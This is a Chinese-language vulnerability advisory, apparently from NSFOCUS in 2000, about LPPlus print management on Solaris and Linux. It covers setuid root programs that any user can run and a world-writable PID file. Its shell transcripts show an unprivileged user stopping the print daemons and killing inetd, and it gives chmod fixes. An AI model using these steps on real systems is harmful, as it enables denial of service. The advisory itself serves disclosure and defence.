安全研究

安全漏洞
LPPlus 权限配置错误拒绝服务漏洞

发布日期:2000-09-07
更新日期:2000-09-07

受影响系统:

Plus Technologies LPPlus 3.3.0 for Solaris 2.x
Plus Technologies LPPlus 3.2.1 for Linux
描述:

LPPlus 是Plus Technologies出品的一个Unix下的打印管理系统。它存在一些安全问题

漏洞一:

  缺省安装时,LPPlus 打印管理系统有几个 setuid root 程序,
  它们包括:

    $LPHOME/bin/dccsched
    $LPHOME/bin/dcclpdser
    $LPHOME/bin/dccbkst

  这三个程序分别启动任务调度、服务器、网络状态守护进程。

    $LPHOME/bin/dccshut
    $LPHOME/bin/dcclpdshut
    $LPHOME/bin/dccbkstshut

  这三个程序分别停止三个守护进程。

  缺省时,任何用户无论他/她拥有什么权限都可以运行这六个程序。
  这导致任何用户度可以启动或停止打印服务。

漏洞二:

  $LPHOME/system/lpdprocess 文件以 777 模式创建。这个文件
包含 dcclpdser 进程的进程号。如果一个用户把它修改成别的进
程的进程号,然后运行 $LPHOME/system/lpdprocess 程序,由于
它是 setuid root 程序,那么他/她就可以关闭任何进程。

<*来源: Dixie Flatline (echo8@FIREST0RM.ORG) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


  漏洞一:

    $ id
    uid=600(test) gid=300(users)
    $ ps -ef|grep dcc
    test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
    root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
    root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
    root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
    $ dccbkstshut
    $ dcclpdshut
    LPD048E Signal sent to dcclpdser to shut down.
    $ dccshut
    LPP054I LP Plus scheduler ordered to shutdown.
    $ ps -ef|grep dcc
    test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
    $

  漏洞二:

    $ id
    uid=600(test) gid=300(users)
    $ ps -ef|grep inet
    test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
    root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
    $ cat > $LPHOME/system/lpdprocess
    12276
    ^D
    $ dcclpdshut
    LPD048E Signal sent to dcclpdser to shut down.
    $ ps -ef|grep inet
    test 26291 26279 0 17:45:17 pts/0 0:00 grep inet



建议:

临时解决办法:

NSFOCUS建议您去除这些程序的suid root位:
chmod u-s $LPHOME/bin/dccsched
chmod u-s $LPHOME/bin/dcclpdser
chmod u-s $LPHOME/bin/dccbkst
chmod u-s $LPHOME/bin/dccshut
chmod u-s $LPHOME/bin/dcclpdshut
chmod u-s $LPHOME/bin/dccbkstshut

厂商补丁:
暂无


浏览次数:5872
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障